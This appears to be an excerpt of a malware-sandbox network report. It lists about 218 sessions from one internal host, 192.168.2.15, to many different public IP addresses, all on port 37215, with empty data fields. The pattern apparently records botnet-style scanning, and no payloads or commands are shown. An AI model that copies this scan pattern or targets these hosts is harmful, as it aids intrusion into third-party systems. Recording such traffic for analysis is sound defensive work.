                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19484192.168.2.1554684203.116.205.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19485192.168.2.155670694.184.182.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19486192.168.2.153837841.154.57.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19487192.168.2.1545576138.97.53.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19488192.168.2.1556776222.227.15.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19489192.168.2.1548148222.118.101.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19490192.168.2.1551202186.243.12.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19491192.168.2.153525245.112.217.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19492192.168.2.1551962157.94.140.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19493192.168.2.155450245.75.82.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19494192.168.2.1557554156.215.83.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19495192.168.2.154643441.69.249.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19496192.168.2.154913841.34.156.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19497192.168.2.1553206122.48.0.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19498192.168.2.1543414156.5.56.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19499192.168.2.154703637.113.10.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19500192.168.2.153670837.57.136.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19501192.168.2.1555352222.44.75.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19502192.168.2.1542388157.155.16.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19503192.168.2.1552196181.42.81.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19504192.168.2.153359831.203.182.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19505192.168.2.1543816190.59.215.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19506192.168.2.1539662197.135.14.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19507192.168.2.155197445.244.43.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19508192.168.2.1545510186.23.240.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19509192.168.2.154291431.76.103.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19510192.168.2.1538408138.100.218.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19511192.168.2.153820095.17.161.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19512192.168.2.153419041.19.98.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19513192.168.2.154917094.117.206.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19514192.168.2.154122819.187.207.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19515192.168.2.153640231.189.232.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19516192.168.2.1535702181.51.44.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19517192.168.2.1550320102.232.211.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19518192.168.2.1540604156.234.63.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19519192.168.2.154954241.131.118.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19520192.168.2.1553010156.79.108.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19521192.168.2.1542020121.71.128.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19522192.168.2.1554892102.143.107.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19523192.168.2.1542816186.91.201.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19524192.168.2.1535734163.66.209.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19525192.168.2.153538837.78.175.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19526192.168.2.1559798121.125.131.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19527192.168.2.154947845.226.232.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19528192.168.2.154380641.30.58.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19529192.168.2.1533208122.121.1.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19530192.168.2.1556490102.156.248.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19531192.168.2.1536852157.106.165.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19532192.168.2.1559612156.116.238.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19533192.168.2.154068419.51.134.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19534192.168.2.1544780126.165.7.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19535192.168.2.153748837.228.184.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19536192.168.2.154213237.15.94.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19537192.168.2.1549210190.64.53.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19538192.168.2.153883037.108.168.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19539192.168.2.155754494.82.245.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19540192.168.2.156009431.254.224.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19541192.168.2.156042645.231.227.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19542192.168.2.1558032156.36.55.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19543192.168.2.154224637.177.181.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19544192.168.2.1542006102.31.138.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19545192.168.2.1560226181.167.57.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19546192.168.2.1541126102.207.239.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19547192.168.2.154924845.186.126.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19548192.168.2.1535832157.145.16.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19549192.168.2.1555434181.159.211.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19550192.168.2.1552350123.117.184.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19551192.168.2.1559594157.150.9.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19552192.168.2.1544700190.210.2.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19553192.168.2.1538890124.119.119.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19554192.168.2.1545742157.228.17.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19555192.168.2.1543496190.240.125.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19556192.168.2.1542492102.178.94.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19557192.168.2.1536650156.174.19.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19558192.168.2.1534042138.52.10.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19559192.168.2.154847631.14.228.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19560192.168.2.155426231.173.180.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19561192.168.2.1557240122.226.84.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19562192.168.2.1548658156.225.1.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19563192.168.2.1549956121.80.149.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19564192.168.2.1545804190.175.22.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19565192.168.2.1544508138.165.203.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19566192.168.2.1534100181.194.12.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19567192.168.2.1550234102.35.25.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19568192.168.2.1533072121.6.55.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19569192.168.2.1556826181.201.62.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19570192.168.2.1550930190.109.164.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19571192.168.2.1534302197.170.214.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19572192.168.2.1539824197.35.53.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19573192.168.2.1552326181.137.126.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19574192.168.2.153336494.111.147.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19575192.168.2.1546838186.202.77.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19576192.168.2.1560518222.213.178.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19577192.168.2.1546176121.80.178.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19578192.168.2.1551620197.169.178.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19579192.168.2.1547036186.248.170.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19580192.168.2.1543730102.248.177.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19581192.168.2.156026641.83.121.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19582192.168.2.1533748102.240.236.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19583192.168.2.1538154190.160.167.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19584192.168.2.1548382121.156.96.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19585192.168.2.154700637.179.38.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19586192.168.2.1555690157.69.71.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19587192.168.2.1549826222.113.92.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19588192.168.2.1537888186.236.183.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19589192.168.2.1553088156.125.223.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19590192.168.2.1558640222.177.155.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19591192.168.2.1556194157.237.14.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19592192.168.2.1554046181.62.206.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19593192.168.2.1533592186.197.62.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19594192.168.2.1547006156.37.216.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19595192.168.2.155419882.38.198.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19596192.168.2.153538241.152.116.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19597192.168.2.154631294.222.23.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19598192.168.2.1549366157.213.84.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19599192.168.2.154761694.227.153.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19600192.168.2.1544368222.50.250.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19601192.168.2.1546644138.17.208.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19602192.168.2.154801641.51.53.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19603192.168.2.153926494.108.186.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19604192.168.2.1543600190.57.16.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19605192.168.2.1540958102.14.216.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19606192.168.2.1559158197.178.189.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19607192.168.2.1537576131.157.188.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19608192.168.2.1533302102.24.50.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19609192.168.2.1551766156.241.131.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19610192.168.2.1559600156.8.122.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19611192.168.2.154741431.116.18.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19612192.168.2.153562031.82.208.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19613192.168.2.1554472190.150.57.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19614192.168.2.1537560197.179.64.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19615192.168.2.1539752102.145.192.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19616192.168.2.1557806122.174.35.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19617192.168.2.1559840197.29.237.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19618192.168.2.1547246222.19.185.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19619192.168.2.1558886102.112.117.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19620192.168.2.1559900156.79.180.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19621192.168.2.1538704186.75.102.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19622192.168.2.1539710197.68.149.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19623192.168.2.154759694.166.48.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19624192.168.2.1547090190.178.18.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19625192.168.2.1545652121.209.200.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19626192.168.2.154368231.27.209.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19627192.168.2.155714694.187.100.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19628192.168.2.1547926121.111.162.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19629192.168.2.1533214222.183.89.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19630192.168.2.155689237.79.133.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19631192.168.2.1538532181.219.193.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19632192.168.2.1546802102.205.127.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19633192.168.2.1552944138.0.30.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19634192.168.2.154068845.185.213.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19635192.168.2.154798831.151.182.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19636192.168.2.1552304102.247.76.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19637192.168.2.1544816222.75.89.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19638192.168.2.1535146190.238.159.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19639192.168.2.1560364190.45.155.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19640192.168.2.1552668197.172.28.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19641192.168.2.1551332203.97.224.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19642192.168.2.1538066181.37.223.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19643192.168.2.154359245.198.65.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19644192.168.2.1535832156.56.80.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19645192.168.2.1559912157.70.66.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19646192.168.2.1539974190.108.47.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19647192.168.2.1537468138.81.128.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19648192.168.2.1534800102.103.120.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19649192.168.2.1560754138.3.175.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19650192.168.2.1535528138.121.29.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19651192.168.2.154559037.210.118.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19652192.168.2.1547406190.47.189.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19653192.168.2.1548708222.135.79.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19654192.168.2.1557694102.230.42.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19655192.168.2.1547172121.101.192.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19656192.168.2.1551662190.251.121.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19657192.168.2.1551554186.131.6.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19658192.168.2.154324094.195.132.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19659192.168.2.154316894.69.44.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19660192.168.2.1547306222.197.109.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19661192.168.2.1534688156.237.164.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19662192.168.2.1545306138.28.221.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19663192.168.2.1538990157.180.75.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19664192.168.2.1557486102.53.207.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19665192.168.2.1558774190.158.77.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19666192.168.2.154222631.149.1.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19667192.168.2.155311445.214.138.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19668192.168.2.1548004197.181.201.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19669192.168.2.153913094.240.15.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19670192.168.2.153710841.108.144.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19671192.168.2.155093841.143.159.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19672192.168.2.1558318222.175.222.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19673192.168.2.1535874156.143.185.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19674192.168.2.1541586103.231.244.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19675192.168.2.1544282157.74.79.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19676192.168.2.1543508121.205.177.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19677192.168.2.1558194208.103.54.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19678192.168.2.1536416190.95.2.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19679192.168.2.1560270122.146.57.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19680192.168.2.1539338190.233.128.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19681192.168.2.1534648122.38.50.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19682192.168.2.154994431.50.209.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19683192.168.2.1549446121.218.212.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19684192.168.2.1532944181.151.99.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19685192.168.2.1537170222.135.76.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19686192.168.2.154464045.155.228.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19687192.168.2.1547712222.195.137.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19688192.168.2.155991037.210.196.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19689192.168.2.1559668102.243.136.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19690192.168.2.1537926121.165.46.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19691192.168.2.1542508186.243.203.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19692192.168.2.153775245.87.18.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19693192.168.2.154829694.16.179.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19694192.168.2.153574841.98.144.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19695192.168.2.1545104156.185.34.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19696192.168.2.1540514186.27.47.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19697192.168.2.1546094157.230.95.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19698192.168.2.1554150121.97.164.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19699192.168.2.1535142186.155.95.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19700192.168.2.153420241.240.2.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19701192.168.2.155071841.8.59.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
